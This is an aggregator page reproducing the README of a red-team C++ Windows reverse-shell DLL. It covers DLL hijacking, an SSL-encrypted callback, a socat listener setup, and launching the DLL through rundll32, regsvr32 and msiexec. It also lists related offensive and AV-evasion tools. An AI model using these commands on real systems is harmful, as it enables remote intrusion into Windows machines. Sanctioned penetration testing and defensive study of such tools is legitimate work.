GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → limbenjamin → ReverseShellDll

limbenjamin / ReverseShellDll

Licence: other
C++ Windows Reverse Shell - Universal DLL Hijack | SSL Encryption | Statically Linked

Programming Languages

C++
36643 projects - #6 most used programming language
c
50402 projects - #5 most used programming language

Labels

windowsencryptionreverse-shelldllpentestingredteam

Projects that are alternatives of or similar to ReverseShellDll

Shelly
Automatic Reverse Shell Generator
Stars: ✭ 38 (-44.93%)
Mutual labels:  reverse-shell, redteam
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (+27.54%)
Mutual labels:  reverse-shell, redteam
MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+462.32%)
Mutual labels:  reverse-shell, redteam
adduser-dll
Simple DLL that add a user to the local Administrators group
Stars: ✭ 48 (-30.43%)
Mutual labels:  dll, redteam
Gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Stars: ✭ 6,030 (+8639.13%)
Mutual labels:  reverse-shell, redteam
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (-30.43%)
Mutual labels:  reverse-shell, redteam
Offensive-Reverse-Shell-Cheat-Sheet
Offensive Reverse Shell (Cheat Sheet)
Stars: ✭ 138 (+100%)
Mutual labels:  reverse-shell, redteam
Girsh
Automatically spawn a reverse shell fully interactive for Linux or Windows victim
Stars: ✭ 66 (-4.35%)
Mutual labels:  reverse-shell, redteam
Hershell
Hershell is a simple TCP reverse shell written in Go.
Stars: ✭ 442 (+540.58%)
Mutual labels:  reverse-shell, redteam
Reverse Shell Cheatsheet
🙃 Reverse Shell Cheat Sheet 🙃
Stars: ✭ 297 (+330.43%)
Mutual labels:  reverse-shell, redteam
Chashell
Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
Stars: ✭ 742 (+975.36%)
Mutual labels:  reverse-shell, redteam
Gorsh
A Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface
Stars: ✭ 97 (+40.58%)
Mutual labels:  reverse-shell, redteam
ScareCrow-CobaltStrike
Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)
Stars: ✭ 387 (+460.87%)
Mutual labels:  dll
1earn
ffffffff0x 团队维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Stars: ✭ 3,715 (+5284.06%)
Mutual labels:  redteam
Inflame
User-mode Windows DLL injector written in Assembly language (FASM syntax) with WinAPI.
Stars: ✭ 63 (-8.7%)
Mutual labels:  dll
RedBook
基于Threathunting-book基础上完善的狩猎视角红队handbook
Stars: ✭ 56 (-18.84%)
Mutual labels:  redteam
KnockOutlook
A little tool to play with Outlook
Stars: ✭ 188 (+172.46%)
Mutual labels:  redteam
BlueReverse
Bluetooth reverse shell.
Stars: ✭ 15 (-78.26%)
Mutual labels:  reverse-shell
UniversalUnityHooks
A framework designed to hook into and modify methods in unity games via dlls
Stars: ✭ 78 (+13.04%)
Mutual labels:  dll
php-reverse-shell
PHP shells that work on Linux OS, macOS, and Windows OS.
Stars: ✭ 274 (+297.1%)
Mutual labels:  reverse-shell
View All Similar Projects ➔

ReverseShellDLL

Main Features

  1. Universal DLL Hijack - ReverseShellDLL uses the DLL_PROCESS_ATTACH notification to ensure that the reverse shell is executed regardless of the export called. When the reverse shell exits, the process is gracefully terminated, hence the "export not found" error message will never show.
  2. SSL Encryption - ReverseShellDLL uses OpenSSL library to perform the encryption.
  3. Statically Linked - ReverseShellDLL will run on all recent Windows versions out of the box without need for .NET framework or Microsoft C Runtime library to be installed.

image

Configuration

domain 	- Domain/IP Address where listener is running
port 	- Port where listener is running
process - Shell to Execute (i.e. cmd.exe, powershell.exe, bash.exe)
exitCmd	- Typing this Cmd will cause the program to terminate


bufferSize (bytes) / delayWait (millisecs)
- High bufferSize and high delayWait will result in huge chunks of output to be buffered and sent at one time.
- Low bufferSize and low delayWait will result in "smooth" terminal experience at the expense of more small packets.  

* Some binaries verify that exports match before loading DLLs. You might have to change the export names in ReverseShellDLL.cpp to match the target hijack binary.

Compilation Instructions

  1. Install OpenSSL. I used the version from https://slproweb.com/products/Win32OpenSSL.html. Installation path is C:\Program Files\OpenSSL-Win64. Make sure to select the option to copy DLL to system folder during installation. Otherwise, you may have to tweak the Project Properties to get it to compile.
  2. Git clone repository
  3. Configure as necessary
  4. Build binary

Running

  1. Generate SSL cert on listener machine
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
cat key.pem cert.pem > test.pem
  1. Start listener. I have success with socat 1.7.3.2 and later. Earlier versions might have issues with protocol negotiation. If using bash, removing crnl from socat command line.
socat openssl-listen:1443,reuseaddr,cert=test.pem,verify=0,fork,crnl -
  1. Deploy DLL in appropriate hijack location. If necessary, it can also be started via rundll32, regserver32 or other LOLBINs.
rundll32.exe ReverseShellDLL.dll,UniversalSoWhatEverYouTypeHereWillWork
rundll32.exe ReverseShellDLL.dll,CoCreateInstance
regsvr32.exe ReverseShellDLL.dll
msiexec /y "C:\path\to\dll\ReverseShellDLL.dll"
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].